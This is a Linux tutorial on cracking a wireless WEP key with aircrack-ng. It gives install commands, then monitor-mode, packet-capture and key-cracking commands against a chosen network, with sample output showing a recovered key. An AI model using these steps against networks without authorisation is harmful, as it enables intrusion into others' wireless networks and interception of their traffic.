How to crack a wireless WEP key using AIR Crack

This article shortly describes simple steps on how to crack a wireless WEP key using aircrack-ng software. This can be done by sniffing a wireless network, capturing encrypted packets and running appropriate encryption cracking program in an attempt to decrypt captured data. WEP ( Wired Equivalent Privacy ) is quite easy to crack as it uses only one key to encrypt all traffic.

The basic principle is that communication between two nodes on the network is based on the MAC address. Each host receives packets only intended for MAC address of its own interface. The same principle also applies for wireless networks. However, if one node sets its own network card into promiscuous mode it will also receive packets which are not addressed for its own MAC address.

To crack the WEP key, a hacker needs to capture sample packets not intended for his own network interface and run crack program to compare testing keys against WEP key bundled with captured packets in attempt of decryption. The key which fits to decrypt captured packets is the key used by wireless network to encrypt its entire wireless communication with its connected stations.

In the following sections, we’ll guide you through aircrack-ng installation on Linux, then show you the step by step instructions to crack a wireless WEP key. The guide assumes that your have wireless network card installed and that it supports monitor mode.

In this tutorial you will learn:

  • How to install aircrack-ng on major Linux distros
  • How to crack a wireless WEP key using aircrack-ng
How to crack a wireless WEP key using aircrack-ng

How to crack a wireless WEP key using aircrack-ng
Software Requirements and Linux Command Line Conventions
Category Requirements, Conventions or Software Version Used
System Any Linux distro
Software aircrack-ng
Other Privileged access to your Linux system as root or via the sudo command.
Conventions # – requires given linux commands to be executed with root privileges either directly as a root user or by use of sudo command
$ – requires given linux commands to be executed as a regular non-privileged user

Install aircrack-ng on major Linux distros

To get started, you will need the aircrack-ng software installed on your system. You can use the appropriate command below to install the program with your system’s package manager.

To install aircrack-ng on Ubuntu, Debian, and Linux Mint:

$ sudo apt install aircrack-ng

To install aircrack-ng on CentOS, Fedora, AlmaLinux, and Red Hat:

$ sudo dnf install aircrack-ng

To install aircrack-ng on Arch Linux and Manjaro:

$ sudo pacman -S aircrack-ng

Crack wireless WEP key

  1. First we need to identify the name of our wireless network interface. If your wireless network card is installed correctly, an iwconfig command will reveal the name of your wireless network interface:
    $ iwconfig
    wlan0     IEEE 802.11  Mode:Monitor  Frequency:2.437 GHz  Tx-Power=20 dBm

    The output shows that in our case, the interface name is wlan0.

  2. Next, turn on monitor mode for the wireless interface.
    # airmon-ng start wlan0
    Interface       Chipset         Driver
    wlan0                   rtl8180 - [phy0]
          (monitor mode enabled on mon0)

    The result of the command will give you the name of the new virtual interface. It tends to be mon0.

  3. Dump the results of the monitor into a terminal, so you can see them.
    # airodump-ng mon0

    You can see a table of data pertaining to wireless networks in your area. You only need information about the network you wish to crack. Look for it, and note the BSSID and the channel that it’s on.

  4. Next, you’re going to log the results of a scan to a file. That capture log will be needed by Aircrack to run a brute force attack on the network later. To get your capture, you’re going to run the same command as before, but you’ll specify your BSSID, channel, and the log location.
    # airodump-ng -c 1 --bssid XX:XX:XX:XX:XX:XX -w Documents/logs/wep-crack mon0

    Fill in your actual information before running the command, and leave it running.

  5. As a last step we crack WEP key by using captured packets and aircrack-ng command. All captured packets are now stored in wep-crack-01.cap file.
    # aircrack-ng -z wep-crack-01.cap

    Your output should look something like this:

    Opening wep-crack-01.cap
    Read 450 packets.
       #  BSSID              ESSID                     Encryption
       1  00:11:95:9F:FD:F4           WEP (210 IVs)
       2  00:17:3F:65:2E:5A  belkin54g                 None (
    Index number of target network ?
                                   Aircrack-ng 1.0 rc1
                   [00:00:13] Tested 485 keys (got 16690 IVs)
       KB    depth   byte(vote)
        0    9/ 13   00(20992) 06(20736) 27(20736) 3F(20736) A2(20736)
        1    0/  1   F3(28416) A8(23296) 34(21248) 57(21248) A3(21248)
        2    0/  2   8E(25856) BC(23808) 3F(23040) D2(22784) 69(21504)
        3    0/  5   6E(24320) 35(22528) 5A(22016) 95(22016) B8(22016)
        4    3/  4   98(21504) 7C(20992) 84(20992) E0(20992) F0(20992)
                             KEY FOUND! [ 3F:F3:8E:6E:98 ]
            Decrypted correctly: 100%
aircrack-ng attempting to crack the WEP key on Linux

aircrack-ng attempting to crack the WEP key on Linux

Closing Thoughts

In this guide, we saw how to install aircrack-ng on Linux and use the software to crack a wireless WEP key. Remember this process should only ever be used to test your own security or for educational purposes. Using it on someone else’s network is illegal.

Comments and Discussions
Linux Forum